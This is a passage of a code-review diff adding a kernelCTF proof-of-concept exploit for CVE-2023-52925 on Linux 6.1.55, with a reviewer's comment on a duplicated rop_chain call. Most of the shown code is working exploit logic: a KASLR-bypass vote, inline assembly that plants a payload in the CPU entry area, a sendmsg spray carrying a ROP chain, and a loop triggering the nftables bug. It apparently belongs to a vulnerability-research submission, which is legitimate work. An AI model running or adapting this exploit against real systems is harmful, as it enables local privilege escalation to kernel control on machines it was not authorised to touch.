pocs/linux/kernelctf/CVE-2023-52925_mitigation/exploit/mitigation-v3-6.1.55/exploit.c

```diff
@@ -0,0 +1,936 @@
+                    if (sum > max) {
+                        max = sum;
+                        max_i = ti;
+                    }
+                }
+
+                bases[vote] = addrs[max_i];
+            }
+
+            int c = 0;
+            for (int i = 0; i < ARRAY_LEN(bases); i++) {
+              if (c == 0) {
+                base = bases[i];
+              } else if (base == bases[i]) {
+                c++;
+              } else {
+                c--;
+              }
+            }
+
+            c = 0;
+            for (int i = 0; i < ARRAY_LEN(bases); i++) {
+              if (base == bases[i]) {
+                c++;
+              }
+            }
+            if (c > ARRAY_LEN(bases) / 2) {
+              goto got_base;
+            }
+
+            printf("majority vote failed:\n");
+            printf("base = %llx with %d votes\n", base, c);
+        }
+      #endif
+    }
+
+got_base:
+    printf("using kernel base %llx\n", base);
+
+    kbase = base;
+    // i64 diff = 0xffffffff81000000 - base;
+    // printf("diff: %lld\n", diff);
+
+    return 0;
+}
+
+static void sig_handler(int s) {}
+
+static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
+  asm volatile (
+	  "mov %0, %%rsp\n"
+	  "pop %%r15\n"
+	  "pop %%r14\n"
+	  "pop %%r13\n"
+	  "pop %%r12\n"
+	  "pop %%rbp\n"
+	  "pop %%rbx\n"
+	  "pop %%r11\n"
+	  "pop %%r10\n"
+	  "pop %%r9\n"
+	  "pop %%r8\n"
+	  "pop %%rax\n"
+	  "pop %%rcx\n"
+	  "pop %%rdx\n"
+	  "pop %%rsi\n"
+	  "pop %%rdi\n"
+	  "divq (0x1234000)\n"
+    "1:\n"
+    "jmp 1b\n"
+    : : "r"(payload)
+  );
+  __builtin_unreachable();
+}
+
+// Fill the CPU entry area exception stack of HELPER_CPU with a
+// struct cpu_entry_area_payload
+static void setup_cpu_entry_area() {
+  if (fork()) {
+    return;
+  }
+
+  struct cpu_entry_area_payload payload = {};
+  payload.nft_expr_eval = kbase + PUSH_RBX_POP_RSP;
+
+  set_affinity(1);
+  signal(SIGFPE, sig_handler);
+  signal(SIGTRAP, sig_handler);
+  signal(SIGSEGV, sig_handler);
+  setsid();
+
+  write_cpu_entry_area(&payload);
+}
+
+#define MSG_SIZE 0x2010
+
+void spray_sendmsg() {
+    char buf[MSG_SIZE];
+    struct msghdr msg = {0};
+    struct sockaddr_in addr = {0};
+    int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+
+    rop_chain((uint64_t*) buf);
+
+    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+    addr.sin_family = AF_INET;
+    addr.sin_port = htons(6666);
+
+    msg.msg_control = buf;
+    msg.msg_controllen = MSG_SIZE;
+    msg.msg_name = (caddr_t)&addr;
+    msg.msg_namelen = sizeof(addr);
+
+    set_affinity(0);
+
+    sendmsg(sockfd, &msg, 0);
+}
+
+void start(){
+    save_state();
+
+    bypass_kaslr(0);
+
+    setup_cpu_entry_area();
+
+    set_affinity(0);
+
+    buf = malloc(BUF_SIZE);
+
+    while(1){
+        printf("try..\n");
+
+        setup();
+
+        setup_table_chain();
+
+        trigger(set_rop_name, chain_rop_name);
+
+        rop_chain((uint64_t*) buf);
+
+        spray_sendmsg();
```

Comment:
Are you calling this twice intentionally or by mistake? If the former, then can you comment here why? See more her: https://google.github.io/security-research/kernelctf/style_guide#explain-duplicated-lines